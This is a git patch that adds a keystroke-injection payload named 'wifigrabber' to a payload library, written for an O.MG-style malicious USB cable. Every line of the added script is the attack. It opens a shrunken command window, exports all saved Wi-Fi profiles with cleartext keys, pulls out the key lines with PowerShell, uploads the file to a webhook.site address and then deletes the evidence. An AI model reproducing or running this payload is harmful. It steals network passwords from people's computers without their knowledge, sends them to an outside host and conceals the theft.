From b89c452d5727087771365b2dd1961912b9de0d6b Mon Sep 17 00:00:00 2001 From: Dante Sparda Date: Tue, 12 Oct 2021 13:03:09 -0400 Subject: [PATCH] wifigrabber --- .../credentials/wifigrabber/payload.txt | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 payloads/library/credentials/wifigrabber/payload.txt diff --git a/payloads/library/credentials/wifigrabber/payload.txt b/payloads/library/credentials/wifigrabber/payload.txt new file mode 100644 index 0000000..31c04a0 --- /dev/null +++ b/payloads/library/credentials/wifigrabber/payload.txt @@ -0,0 +1,27 @@ +REM I took my own code and found the other version already made. I combined them to make it better +REN this is a modified version of https://github.com/MTK911/Attiny85/blob/master/payloads/Wi-Fi%20password%20stealer/Wifikey-Grab.ino +REM this is designed for the omg cable instead of the tiny. + + +Delay 3000 +STRING GUI r +Delay 100 +String cmd /k mode con: cols=15 lines=1 +Enter +Delay 500 +String cd %temp% +Enter +Delay 500 +String netsh wlan export profile key=clear +Enter +Delay 1000 +String powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS +Enter +Delay 3000 +String powershell Invoke-WebRequest -Uri https://webhook.site/ -Method POST -InFile Wi-Fi-PASS +Enter +Delay 3000 +String del Wi* /s /f /q +Enter +Delay 1000 +Exit